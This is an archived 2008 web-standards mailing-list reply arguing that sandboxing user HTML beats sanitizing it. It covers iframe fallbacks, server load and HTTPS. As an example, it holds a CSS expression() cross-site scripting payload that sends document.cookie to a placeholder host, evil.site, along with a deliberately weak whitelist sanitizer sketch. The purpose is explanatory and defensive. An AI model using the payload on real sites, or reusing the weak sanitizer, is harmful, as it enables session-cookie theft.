- From: Frode Børli <frode@seria.no>
- Date: Tue, 17 Jun 2008 20:33:33 +0200
> 1. Please elaborate how an extension of CSS would require a sanitizer
> update.

In the year 1998, a sanitizer algorithm works perfectly against all existing methods of injecting scripts. It uses a whitelist, which allows only certain tags and attributes. Among the allowed attributes are colspan, rowspan and style - since the web developer wants users to be able to build tables and style them properly.

In 1999 Internet Explorer 5.0 is released, and it introduces a new invention: CSS expressions. Suddenly the formerly secure web application is no longer secure. A user adds the following code, and it passes the sanitizer easily:

<span style='color: blue; width: expression(document.write("<img src=http://evil.site/"+document.cookie));'></span>

I am absolutely certain that there will be other, equally clever inventions in the future that will break sanitizers - of course we cannot know today which ones - but sandboxing means that browser vendors in the future can prevent the scenario above.

> 2. Please explain why using a dedicated tag with double parsing is easier
> for a Web developer than putting the code in an attribute.

1. The code will still work in Dreamweaver and similar tools.

2. It is not a totally new way of doing things; we already escape content that is put into <textarea> in exactly the same way I suggest we put content into the sandbox. Putting a 100 KB piece of user-submitted content into an attribute will feel strange - and might even break current parsers.

3. Web developers do not have to create separate scripts to cater for HTML 4 browsers (so that the <iframe src=> fallback will work).

4. Web developers do not have to create two separate websites (on different domains) that share the same database just to make sure that cross-site scripting cannot happen from the iframe to the parent document. If the web developer simply places a separate script on the same host, then the fallback will have no security at all.

5.
The fallback requires the web developer to know the visible size of the content in advance. HTML 4 browsers do not support any method of resizing the <iframe> according to its content when the content of the iframe comes from a different domain.

> 3. Your quoting solution would not cause legacy browsers to show plain
> text; they would show HTML code, which is probably much worse than showing
> plain text. If you mean JavaScript can be used to extract plain text, I
> doubt it will be simple; there are probably lots of junctions where this
> procedure can derail.

I am pretty sure that including a small script similar to this in the main document will make the content very readable, although plain text:

<script>
var els = document.getElementsByTagName("DATA");
// Plain index loop: for...in over an HTMLCollection would also visit
// properties such as length, which have no innerHTML.
for (var i = 0; i < els.length; i++) {
  els[i].innerHTML = els[i].innerHTML
    .replace(/<[^>]*>/g, "")
    .replace(/\n/g, "<br>");
}
</script>

I can guarantee you that with a few hours of work I would have a very good script that does this very well.

> 4. Please explain why you consider network efficiency for legacy user
> agents essential. I believe that the correlation between efficiency and
> compatibility is negative in general.

It is not the network efficiency of the user agents I am worried about - it is the server side of things that will be the problem. If the server has to handle 20 separate dynamic requests just to display a single page view, then that is unacceptable - and the method will never be used by bigger websites, simply because it does not scale. In fact, it would already have been done if it were a viable option. Please consider my answer to your question number two as well.

> If that causes server overload, the
> server can discriminate content depending on the user agent; this is a
> temporary solution to an edge case and it should probably be acceptable.

That is unacceptable.
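To make the question-1 scenario concrete, here is a minimal sketch of such a whitelist sanitizer. Everything in it is hypothetical and illustrative - the tag and attribute lists, the regexes and the sanitize function are not taken from any real library - but it shows how the expression() payload sails straight through, because style is a whitelisted attribute:

```javascript
// Hypothetical 1998-era whitelist sanitizer (illustrative only; the
// tag/attribute lists and regexes are not from any real library).
const ALLOWED_TAGS = new Set(["b", "i", "u", "table", "tr", "td", "span"]);
const ALLOWED_ATTRS = new Set(["colspan", "rowspan", "style"]);

function sanitize(html) {
  // Rewrite every tag: drop non-whitelisted tags entirely and strip
  // non-whitelisted attributes from the tags that are kept.
  return html.replace(
    /<(\/?)([a-z0-9]+)((?:\s+[a-z-]+(?:='[^']*'|="[^"]*")?)*)\s*>/gi,
    (match, slash, tag, attrs) => {
      if (!ALLOWED_TAGS.has(tag.toLowerCase())) return "";
      const kept = (attrs.match(/[a-z-]+(?:='[^']*'|="[^"]*")?/gi) || [])
        .filter(a => ALLOWED_ATTRS.has(a.split("=")[0].toLowerCase()));
      return "<" + slash + tag + (kept.length ? " " + kept.join(" ") : "") + ">";
    }
  );
}

// 1998: looks safe - script tags and event handlers are stripped.
sanitize("<b onclick='steal()'>hi</b>");  // "<b>hi</b>"

// 1999: the whitelisted style attribute now carries executable code.
sanitize("<span style='width: expression(alert(document.cookie))'>x</span>");
// passes through unchanged
```

The whitelist was correct on the day it was written; a later browser feature turned an allowed attribute into an execution vector. That is exactly the failure mode that sandboxing survives and sanitizing does not.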
Major websites must accommodate at least 98% of their user base at all times, and promoting user-agent sniffing on the server side is a major issue for me, and most likely for most other web developers who work on a per-project basis. It would require me to review already-launched sites regularly, which is hardly an efficient use of my labour.

> Besides, a blog page with 60 comments on it is rather hard to render and
> read so you should probably consider other display options in this case.

I am extremely opposed to assumptions of the kind "a blog page with 60 comments on it is rather hard to read, so it will never be a problem". I prefer scrolling to clicking "next page" any time. If there is a choice to display 100 comments instead of 10, then I select 100 comments. Also, user-generated content might be single-line comments, or even just a list of single words.

> 5. I am not sure why IFRAME content must be HTTP-secured if the containing
> page is. The specification does not impose such a restriction AFAIK. And,
> if you need to go secure, do not allow scribbling in the first place, right?

1. An insecure iframe in a secure document will trigger security warnings from the browser ("There are insecure elements on this page, do you want to display them?").

2. Mixing secure and insecure communications makes having the secure channel pointless.

3. It is extremely dangerous to assume that nobody in the future will ever need secure communications involving user-generated content.

Best regards,
Frode Børli - Seria.no
Received on Tuesday, 17 June 2008 11:33:33 UTC